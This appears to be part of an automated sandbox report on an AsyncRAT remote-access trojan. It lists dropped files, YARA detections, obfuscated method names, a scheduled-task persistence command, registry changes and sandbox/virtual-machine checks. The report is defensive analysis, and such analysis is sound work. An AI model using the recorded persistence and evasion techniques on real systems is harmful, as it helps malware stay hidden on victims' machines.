            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\ame.exe
            Source: C:\Users\user\AppData\Local\Temp\ame.exe | File created: C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\fi.exe
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

            Boot Survival:

            Yara detected AsyncRAT
            Source: Yara match | File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara match | File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara match | File source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Users\user\AppData\Local\Temp\ame.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\Linkage
            Source: C:\Users\user\AppData\Local\Temp\ame.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\Linkage

            Hooking and other Techniques for Hiding and Protection:

            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | File opened: C:\Users\user\AppData\Local\Temp\fi.exe:Zone.Identifier read attributes | delete
            Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\ame.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AsyncRAT
            Source: Yara match - File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match - File source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match - File source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match - File source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match - File source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match - File source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match - File source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match - File source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match - File source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match - File source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara match - File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara match - File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara match - File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara match - File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara match - File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara match - File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara match - File source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara match - File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Notepads.exe - Binary or memory string: SBIEDLL.DLL
            Source: wscript.exe, 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, ame.exe, 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, Notepads.exe, 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, Notepads.exe.3.dr - Binary or memory string: SBIEDLL.DLLME: CHAT
            Source: C:\Windows\System32\wscript.exe - File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\ame.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\fi.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Notepads.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe - Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe - Window found: window name: WSH-Timer
            Source: C:\Users\user\AppData\Local\Temp\fi.exe - Window / User API: foregroundWindowGot 933
            Source: C:\Users\user\AppData\Local\Temp\ame.exe TID: 6628 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6724 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6692 - Thread sleep time: -200000s >= -30000s
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6984 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Notepads.exe TID: 3000 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Notepads.exe - Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\fi.exe - Code function: 4_2_02340D66 GetSystemInfo,
            Source: C:\Users\user\AppData\Local\Temp\ame.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\fi.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Notepads.exe - Thread delayed: delay time: 922337203685477
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp - Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes6
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp - Binary or memory string: $Hyper-V Hypervisor Logical Processor
            Source: Notepads.exe, 0000001A.00000002.602077187.000000001BE94000.00000004.00000001.sdmp - Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider Pipes[
            Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp - Binary or memory string: JHyper-V Hypervisor Logical Processor.
            Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.594189844.000000000150C000.00000004.00000020.sdmp, Notepads.exe, 0000001E.00000002.575946515.0000000001378000.00000004.00000020.sdmp - Binary or memory string: Hyper-V Dynamic Memory Integration Service
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp - Binary or memory string: sWDHyper-V Hypervisor Root Partition~
            Source: Notepads.exe, 0000001E.00000002.587730266.000000001BF61000.00000004.00000001.sdmp - Binary or memory string: &Hyper-V Hypervisorw
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp - Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: Notepads.exe, 0000001A.00000003.562811005.000000001BFAF000.00000004.00000001.sdmp - Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipesk|
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp - Binary or memory string: THyper-V Hypervisor Root Virtual Processor
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp - Binary or memory string: !Hyper-V Virtual Machine Bus Pipes
            Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp - Binary or memory string: sWDHyper-V Hypervisor Root Partition
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp - Binary or memory string: *Hyper-V Dynamic Memory Integration Service
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp - Binary or memory string: &Hyper-V Hypervisor
            Source: Notepads.exe, 0000001A.00000003.562291823.000000000154D000.00000004.00000001.sdmp - Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipesx
            Source: Notepads.exe, 0000001A.00000002.603514623.000000001C841000.00000004.00000001.sdmp - Binary or memory string: % Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186P
            Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmp - Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipes:
            Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmp - Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider Pipes*
            Source: ame.exe, 00000003.00000003.526302917.000000001B2B7000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp - Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
            Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp - Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipes
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmp - Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp - Binary or memory string: )Hyper-V Hypervisor Root Virtual Processor
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp - Binary or memory string: VHyper-V Dynamic Memory Integration Service
            Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmp - Binary or memory string: *Hyper-V Virtual Machine Bus Provider Pipes
            Source: ame.exe, 00000003.00000002.555441828.000000001C01C000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp - Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
            Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmp - Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipes[
            Source: Notepads.exe.3.dr - Binary or memory string: vmware
            Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmp - Binary or memory string: Hyper-V mrytefrbsbkgqcx Bus]
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp - Binary or memory string: JHyper-V Hypervisor Logical Processor
            Source: ame.exe, 00000003.00000003.526156092.000000001C056000.00000004.00000001.sdmp - Binary or memory string: st Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
